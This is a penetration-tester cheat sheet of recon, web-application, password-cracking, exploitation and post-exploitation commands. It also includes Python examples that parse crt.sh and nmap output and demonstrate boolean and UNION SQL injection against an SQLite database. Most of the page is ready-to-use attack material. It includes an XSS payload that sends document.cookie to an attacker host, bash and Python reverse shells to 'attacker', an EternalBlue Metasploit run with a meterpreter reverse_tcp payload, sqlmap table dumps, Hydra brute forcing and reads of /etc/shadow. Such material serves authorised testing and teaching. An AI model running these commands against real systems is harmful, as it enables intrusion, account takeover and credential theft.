HxHippy

Pentester Cheat Sheet

Reconnaissance, exploitation, and security testing.

Last updated: 2025-01-15

Quick Reference

# Quick recon
nmap -sV -sC -oA initial_scan target

# Web enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

# Check for SQLi
sqlmap -u "http://target/page?id=1" --batch

Reconnaissance

Passive Recon

# DNS enumeration (ANY is often refused or minimised per RFC 8482, so also query record types individually)
dig target.com ANY
dig target.com MX
dig target.com NS
host -t ns target.com

# WHOIS
whois target.com

# Subdomain discovery
subfinder -d target.com
amass enum -d target.com

# Certificate transparency (the % wildcard must be URL-encoded as %25)
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
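
The crt.sh response needs more cleanup than `sort -u` gives you: `name_value` carries every SAN on a certificate separated by newlines, wildcards appear as `*.target.com`, case varies, and a plain substring match for `target.com` also keeps unrelated domains such as `nottarget.com`. The following is an added example (not part of the original cheat sheet) that normalises a crt.sh JSON response into a deduplicated host list; the sample records are constructed for the demonstration and the function names are my own.

```python
import json

# Constructed sample in the shape crt.sh returns for ?output=json: a list of
# certificate records whose name_value holds newline-separated SAN entries.
# These are made-up records, not a real crt.sh response.
CRTSH_SAMPLE = json.dumps([
    {"common_name": "www.target.com",
     "name_value": "target.com\nwww.target.com"},
    {"common_name": "*.target.com",
     "name_value": "*.target.com\ntarget.com"},
    {"common_name": "dev.target.com",
     "name_value": "dev.target.com\nstaging.target.com\nVPN.Target.com"},
    {"common_name": "nottarget.com",      # suffix collision a naive grep would keep
     "name_value": "nottarget.com"},
    {"common_name": "mail.target.com",
     "name_value": "mail.target.com\nmail.target.com"},
])


def subdomains_from_crtsh(raw_json: str, domain: str) -> list[str]:
    """Return the unique, normalised hostnames under `domain` found in a
    crt.sh JSON response (the apex itself is included)."""
    domain = domain.lower()
    suffix = "." + domain
    found: set[str] = set()
    for cert in json.loads(raw_json):
        # name_value lists every SAN on the cert, one per line
        for name in cert.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                # A wildcard names no host; keep the zone it covers so the
                # record still contributes something.
                name = name[2:]
            # Match on the label boundary so nottarget.com is excluded
            if name == domain or name.endswith(suffix):
                found.add(name)
    return sorted(found)


def hosts_only(names: list[str], domain: str) -> list[str]:
    """Drop the apex so the list can go straight into a resolver or scanner."""
    return [n for n in names if n != domain.lower()]


if __name__ == "__main__":
    names = subdomains_from_crtsh(CRTSH_SAMPLE, "target.com")
    for n in hosts_only(names, "target.com"):
        print(n)
```

Feed the real response in with `curl -s "https://crt.sh/?q=%25.target.com&output=json"` and pipe the output to a resolver; expired certificates are deliberately kept, since a hostname that once had a certificate is still a hostname worth checking.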

Active Recon

# Port scan (-p- covers all 65535 TCP ports; -sU needs root)
nmap -sV -sC target
nmap -p- -T4 target
nmap -sU --top-ports 100 target

# Service version (intensity 0-9, default 7; 9 tries every probe)
nmap -sV --version-intensity 5 target

# OS detection (needs root)
nmap -O target

# Vuln scan (noisy, and the vuln category includes intrusive scripts, so confirm scope first)
nmap --script vuln target
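
The `-oA initial_scan` in the quick reference writes `initial_scan.gnmap`, nmap's greppable output, which is the easiest form to turn into input for the web enumeration step below. This added example (my code, not part of the original page) parses that format and builds the URL list for gobuster/feroxbuster/ffuf; the sample scan text is constructed and the hosts and banners in it are made up.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap greppable output (.gnmap). Hosts and banners are
# invented for the example.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sV -sC -oA initial_scan 10.0.0.0/30\n"
    "Host: 10.0.0.1 ()\tStatus: Up\n"
    "Host: 10.0.0.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.52 ((Ubuntu))/, "
    "443/open/tcp//ssl|http//Apache httpd 2.4.52 ((Ubuntu))/\tIgnored State: closed (997)\n"
    "Host: 10.0.0.2 ()\tStatus: Up\n"
    "Host: 10.0.0.2 ()\tPorts: 445/open/tcp//microsoft-ds//Windows Server 2016 Standard 14393 microsoft-ds/, "
    "3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (997)\n"
    "# Nmap done -- 4 IP addresses (2 hosts up) scanned in 300.12 seconds\n"
)


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    name: str
    version: str


_HOST_RE = re.compile(r"^Host:\s+(\S+)")


def parse_gnmap(text: str) -> dict[str, list[Service]]:
    """Return {host: [open services]} from nmap greppable output.

    Each Ports: entry is port/state/proto/owner/service/rpcinfo/version/ and
    nmap writes any '/' inside a field as '|' (hence 'ssl|http')."""
    results: dict[str, list[Service]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue  # comment lines and Status-only lines carry no ports
        host = _HOST_RE.match(line).group(1)
        ports_field = line.split("\tPorts:", 1)[1].split("\t", 1)[0].strip()
        open_services = results.setdefault(host, [])
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, name, _rpc, version = fields[:7]
            if state != "open":
                continue  # drop filtered/closed entries
            open_services.append(Service(int(port), proto, name, version))
    return results


def web_targets(results: dict[str, list[Service]]) -> list[str]:
    """Build the URLs to hand to gobuster/feroxbuster/ffuf."""
    urls = []
    for host, services in results.items():
        for svc in services:
            if "http" not in svc.name:
                continue
            scheme = "https" if ("ssl" in svc.name or svc.name == "https") else "http"
            urls.append(f"{scheme}://{host}:{svc.port}")
    return urls


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for host, services in scan.items():
        for svc in services:
            print(f"{host}:{svc.port}/{svc.proto}  {svc.name}  {svc.version}")
    print("web targets:", web_targets(scan))
```

Replace `SAMPLE_GNMAP` with `open("initial_scan.gnmap").read()` to use it on a real scan; filtered ports are dropped on purpose because a firewall that swallows probes gives you nothing to enumerate.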

Web Application

Directory/File Enumeration

# Gobuster
gobuster dir -u http://target -w wordlist.txt -x php,txt,html

# Feroxbuster
feroxbuster -u http://target -w wordlist.txt

# ffuf
ffuf -u http://target/FUZZ -w wordlist.txt

SQLi Testing

# SQLMap
sqlmap -u "http://target/page?id=1" --dbs
sqlmap -u "http://target/page?id=1" -D database --tables
sqlmap -u "http://target/page?id=1" -D database -T users --dump

# POST request
sqlmap -u "http://target/login" --data="user=admin&pass=test" --dbs

# Cookie-based
sqlmap -u "http://target/" --cookie="session=abc123" --dbs
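
sqlmap's first probes against `page?id=1` are boolean-based: it appends a tautology and a contradiction and compares the responses, then moves to UNION queries for `--tables` and `--dump`. The following added example (my code, not taken from the page or from sqlmap) reproduces both steps against an in-memory SQLite database, with the string-concatenated query beside the parameterised fix so you can see why the second one fails the same probes. The schema, rows and function names are constructed for the demonstration.

```python
import sqlite3
from typing import Callable


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the target's backend."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, is_admin INTEGER)"
    )
    con.executemany(
        "INSERT INTO users (username, email, is_admin) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", 1),
         ("bob", "bob@example.com", 0),
         ("carol", "carol@example.com", 0)],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """How page?id=1 is usually broken: the parameter is pasted into the SQL."""
    sql = f"SELECT id, username, email FROM users WHERE id = {user_id}"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> list:
    """The fix: validate the type, then bind the value as a parameter."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return con.execute(
        "SELECT id, username, email FROM users WHERE id = ?", (uid,)
    ).fetchall()


Lookup = Callable[[sqlite3.Connection, str], list]


def is_injectable(lookup: Lookup, con: sqlite3.Connection, base: str = "1") -> bool:
    """Boolean-based check: a tautology and a contradiction appended to a
    known-good value must give different results if the input reaches the
    query unquoted. Identical results mean the probe never reached SQL."""
    true_rows = lookup(con, f"{base} AND 1=1")
    false_rows = lookup(con, f"{base} AND 1=2")
    return true_rows != false_rows


def dump_tables(lookup: Lookup, con: sqlite3.Connection) -> list:
    """UNION-based table enumeration (what sqlmap --tables does for SQLite).
    The injected SELECT must return as many columns as the original (3)."""
    rows = lookup(con, "0 UNION SELECT 0, name, sql FROM sqlite_master WHERE type='table'")
    return [r[1] for r in rows]


def dump_users(lookup: Lookup, con: sqlite3.Connection) -> list:
    """UNION-based row dump (sqlmap -T users --dump); id = 0 matches nothing,
    so every row returned comes from the injected SELECT."""
    return lookup(con, "0 UNION SELECT id, username, email FROM users")


if __name__ == "__main__":
    con = make_db()
    print("vulnerable injectable:", is_injectable(lookup_vulnerable, con))
    print("safe injectable:", is_injectable(lookup_safe, con))
    print("tables:", dump_tables(lookup_vulnerable, con))
    print("users:", dump_users(lookup_vulnerable, con))
```

Against a real application the "responses" are HTTP bodies rather than row lists, so sqlmap compares page content (after stripping dynamic parts) instead of tuples, but the logic is the same: if `id=1 AND 1=1` and `id=1 AND 1=2` render differently, the parameter is in the query.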

XSS Testing

// Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// Cookie exfiltration (cookies flagged HttpOnly are invisible to document.cookie)
<script>document.location='http://attacker/steal?c='+encodeURIComponent(document.cookie)</script>

Password Attacks

Brute Force

# Hydra - SSH
hydra -l admin -P passwords.txt target ssh

# Hydra - HTTP POST (last field is a string found in the failed-login response; use S=... to match on success instead)
hydra -l admin -P passwords.txt target http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"

# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --show hashes.txt

# Hashcat
hashcat -m 0 hashes.txt rockyou.txt  # MD5
hashcat -m 1000 hashes.txt rockyou.txt  # NTLM

Hash Identification

# Identify hash type
hash-identifier
hashid hash.txt

# Common formats (length alone is ambiguous: MD5 and NTLM are both 32 hex chars,
# so let the source decide, e.g. SAM/NTDS dumps are NTLM)
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars

Exploitation

Metasploit

# Start
msfconsole

# Search
search eternalblue
search type:exploit platform:windows

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit

Shells

# Reverse shell (bash)
bash -i >& /dev/tcp/attacker/4444 0>&1

# Reverse shell (python; use python3 where only that exists)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'

# Listener
nc -lvnp 4444

# Upgrade to a full TTY (use python3 if python is absent)
python -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl-Z, and on the attacker side: stty raw -echo; fg

Post Exploitation

# Linux
whoami && id
cat /etc/passwd
cat /etc/shadow  # readable only as root (or a member of the shadow group)
find / -perm -4000 -type f 2>/dev/null  # SUID binaries
sudo -l

# Windows
whoami /priv
net user
net localgroup administrators

Reporting Template

## Finding: [Vulnerability Name]

**Severity:** Critical/High/Medium/Low
**CVSS Score:** X.X

### Description
Brief description of the vulnerability.

### Impact
What an attacker could do.

### Proof of Concept
Steps to reproduce with evidence.

### Remediation
How to fix the issue.